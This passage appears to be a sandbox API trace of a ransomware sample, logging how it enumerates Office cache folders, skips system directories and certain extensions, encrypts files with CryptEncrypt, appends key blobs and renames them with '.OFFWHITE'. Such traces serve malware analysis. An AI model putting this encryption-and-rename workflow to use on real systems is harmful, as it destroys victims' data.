lpNewFilePointer=0x0) returned 1 [0086.573] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0xe00, lpOverlapped=0x0) returned 1 [0086.573] GetProcessHeap () returned 0x500000 [0086.573] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0086.573] CloseHandle (hObject=0x21c) returned 1 [0086.574] GetProcessHeap () returned 0x500000 [0086.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.574] GetProcessHeap () returned 0x500000 [0086.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.574] GetProcessHeap () returned 0x500000 [0086.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.574] GetProcessHeap () returned 0x500000 [0086.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.574] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" [0086.574] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.OFFWHITE" [0086.574] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.offwhite")) returned 1 [0086.575] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ShellUI.MST", cAlternateFileName="")) returned 0 [0086.575] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0086.575] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0086.575] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0086.576] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0086.576] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0086.576] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0086.576] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0086.576] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0117-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C" [0086.576] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" [0086.576] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" [0086.576] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0086.576] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0086.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0086.581] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0086.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0086.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0086.581] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2=".") returned 1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="..") returned 1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="...") returned 1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="windows") returned -1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="$recycle.bin") returned 1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="rsa") returned -1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="ntuser.dat") returned -1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="programdata") returned -1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="appdata") returned -1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="program files") returned -1 [0086.581] lstrcmpiW (lpString1="Access.en-us", lpString2="program files (x86)") returned -1 [0086.582] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" [0086.582] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Access.en-us" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us" [0086.582] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" [0086.582] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" [0086.582] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*" [0086.582] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0086.636] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0086.636] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0086.636] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0086.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0086.636] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2=".") returned 1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="..") returned 1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="...") returned 1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="windows") returned -1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="$recycle.bin") returned 1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="rsa") returned -1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="ntuser.dat") returned -1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="programdata") returned -1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="appdata") returned -1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="program files") returned -1 [0086.636] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="program files (x86)") returned -1 [0086.637] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" [0086.637] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="AccessMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" [0086.637] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.637] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.637] PathFindExtensionW (pszPath="AccessMUI.msi") returned=".msi" [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0086.637] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0086.637] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0086.637] lstrcmpiW (lpString1="AccessMUI.xml", lpString2=".") returned 1 [0086.637] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="..") returned 1 [0086.637] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="...") returned 1 [0086.637] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="windows") returned -1 [0086.637] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="$recycle.bin") returned 1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="rsa") returned -1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="ntuser.dat") returned -1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="programdata") returned -1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="appdata") returned -1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="program files") returned -1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="program files (x86)") returned -1 [0086.638] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" [0086.638] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="AccessMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" [0086.638] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.638] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.638] PathFindExtensionW (pszPath="AccessMUI.xml") returned=".xml" [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.638] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.638] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0086.638] GetProcessHeap () returned 0x500000 [0086.639] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547cc8 [0086.639] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0086.640] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=1349) returned 1 [0086.640] GetProcessHeap () returned 0x500000 [0086.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.640] GetProcessHeap () returned 0x500000 [0086.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.640] GetProcessHeap () returned 0x500000 [0086.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.640] GetProcessHeap () returned 0x500000 [0086.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.640] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.640] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.640] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.640] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.640] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.640] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.640] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.640] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.640] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0086.641] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.641] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.641] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0086.641] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x545, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.641] SetLastError (dwErrCode=0x0) [0086.641] WriteFile (in: hFile=0x214, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0086.648] GetLastError () returned 0x0 [0086.648] GetLastError () returned 0x0 [0086.648] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x645, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.648] WriteFile (in: hFile=0x214, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0086.648] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x745, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.649] WriteFile (in: hFile=0x214, lpBuffer=0x547cc8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x547cc8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0086.649] GetProcessHeap () returned 0x500000 [0086.649] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x545) returned 0x52e7e8 [0086.649] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.649] ReadFile (in: hFile=0x214, lpBuffer=0x52e7e8, nNumberOfBytesToRead=0x545, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x52e7e8*, lpNumberOfBytesRead=0x295dec0*=0x545, lpOverlapped=0x0) returned 1 [0086.649] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.649] WriteFile (in: hFile=0x214, lpBuffer=0x52e7e8*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e7e8*, lpNumberOfBytesWritten=0x295decc*=0x545, lpOverlapped=0x0) returned 1 [0086.649] GetProcessHeap () returned 0x500000 [0086.649] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52e7e8 | out: hHeap=0x500000) returned 1 [0086.649] CloseHandle (hObject=0x214) returned 1 [0086.652] GetProcessHeap () returned 0x500000 [0086.653] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.653] GetProcessHeap () returned 0x500000 [0086.653] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.653] GetProcessHeap () returned 0x500000 [0086.653] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.653] GetProcessHeap () returned 0x500000 [0086.653] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.653] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" [0086.653] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.OFFWHITE" [0086.653] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.offwhite")) returned 1 [0086.654] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2=".") returned 1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", 